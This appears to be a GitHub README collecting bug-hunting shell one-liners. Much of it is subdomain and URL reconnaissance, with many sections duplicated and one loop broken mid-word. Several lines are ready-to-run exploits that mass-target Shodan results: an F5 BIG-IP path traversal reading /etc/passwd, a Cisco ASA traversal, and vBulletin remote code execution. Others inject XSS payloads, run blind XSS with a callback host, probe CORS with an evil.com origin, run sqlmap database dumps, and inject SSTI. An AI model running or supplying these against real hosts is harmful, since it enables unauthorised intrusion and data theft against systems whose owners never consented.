hackliner icon indicating copy to clipboard operation
hackliner copied to clipboard

Hackliner: Cybersec/Bughunting Oneliners

Hackliner: Cybersecurity/Bughunting Oneliners

A collection of cyber security one-liner scripts.


Get Subdomains from RapidDNS.io


curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u
Get Subdomains from BufferOver.run


curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u


export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"
Get Subdomains from Riddler.io


curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 
Get Subdomains from VirusTotal


curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Get Subdomain with cyberxplore


curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 
Get Subdomains from CertSpotter


curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 
Get Subdomains from Archive


curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
Get Subdomains from JLDC


curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Get Subdomains from securitytrails


curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u
Bruteforcing Subdomain using DNS Over


while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt
Get Subdomains With sonar.omnisint.io


curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 
Get Subdomains With synapsint.com


curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 
Get Subdomains from crt.sh


curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
Sort & Tested Domains from Recon.dev


curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent
Subdomain Bruteforcer with FFUF


ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'



gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt


waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt


cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"





shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done


while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt


cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done


shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done



while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt



cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done

vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution


shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

Find JavaScript Files


assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done

Extract Endpoints from JavaScript


cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u

Get CIDR & Org Information from Target Lists


for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
one | uniq); done

Get Subdomains from RapidDNS.io


curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u

Get Subdomains from BufferOver.run


curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u


export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"

Get Subdomains from Riddler.io


curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from VirusTotal


curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomain with cyberxplore


curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 

Get Subdomains from CertSpotter


curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from Archive


curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

Get Subdomains from JLDC


curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from securitytrails


curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u

Bruteforcing Subdomain using DNS Over


while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt

Get Subdomains With sonar.omnisint.io


curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

Get Subdomains With synapsint.com


curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

Get Subdomains from crt.sh


curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

Sort & Tested Domains from Recon.dev


curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent

Subdomain Bruteforcer with FFUF


ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'

Find Allocated IP Ranges for ASN from IP Address


whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n

Extract IPs from a File


grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt

Ports Scan without CloudFlare


subfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe

Create Custom Wordlists


gau HOST | unfurl -u keys | tee -a FILE1.txt; gau HOST | unfurl -u paths | tee -a FILE2.txt; sed 's#/#\n#g' FILE2.txt | sort -u | tee -a FILE1.txt | sort -u; rm FILE2.txt  | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' FILE1.txt
cat HOSTS.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a FILE.txt  

Extracts Juicy Informations

@Prial Islam Khan

for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt  ;done

Dump Custom URLs from ParamSpider


cat HOSTS.txt | xargs -I % python3 paramspider.py -l high -o ./OUT/% -d %;

URLs Probing with cURL + Parallel


cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk

Dump In-scope Assets from chaos-bugbounty-list


curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'

Dump In-scope Assets from bounty-targets-data


HackerOne Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'

BugCrowd Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Intigriti Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'

YesWeHack Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

HackenProof Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'

Federacy Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Dump URLs from sitemap.xml


curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'

Pure Bash Linkfinder


curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > FILE.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < FILE.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf FILE.txt

Extract Endpoints from swagger.json


curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'

CORS Misconfiguration


site="URL"; gau "$site" | while read url; do target=$(curl -sIH "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found] echo $url; else echo Nothing on "$url"; fi; done

Find Hidden Servers and/or Admin Panels


ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt 

Recon Using api.recon.dev


curl -s -w "\n%{http_code}" https://api.recon.dev/search?domain=HOST | jg .[].domain

Find Live Host/Domain/Assets


subfinder -d HOST -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

XSS without gf


waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -sk --path-as-is "$host" | grep -qs "<script>alert(1)</script>" && echo "$host is vulnerable"; done

Get Subdomains from IPs


python3 hosthunter.py HOSTS.txt > OUT.txt

Gather Domains from Content-Security-Policy


curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" |  sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u

Nmap IP:PORT Parser Piped to HTTPX


nmap -v0 HOST -oX /dev/stdout | jc --xml -p | jq -r '.nmaprun.host | (.address["@addr"] + ":" + .ports.port[]["@portid"])' | httpx --silent

Filtering URLs and Exploiting SQL Injection


cat url.txt | gau | egrep -v '(.js|.png|.svg|.gif|.jpg|.txt)'|tee sqli.txt && sqlmap -m sqli.txt -dbs --batch

Automated SSTI (Server-Side Template Injection) Vulnerability Scanner


cat url.txt | gau -subs | grep '=' | egrep -v '(\.js|\.png|\.svg|\.gif|\.jpg|\.jpeg|\.txt|\.css|\.ico)' | qsreplace "ssti{{7*7}}" | while read url; do cur=$(curl -s $url | grep "ssti49"); echo -e "$url -> $cur"; done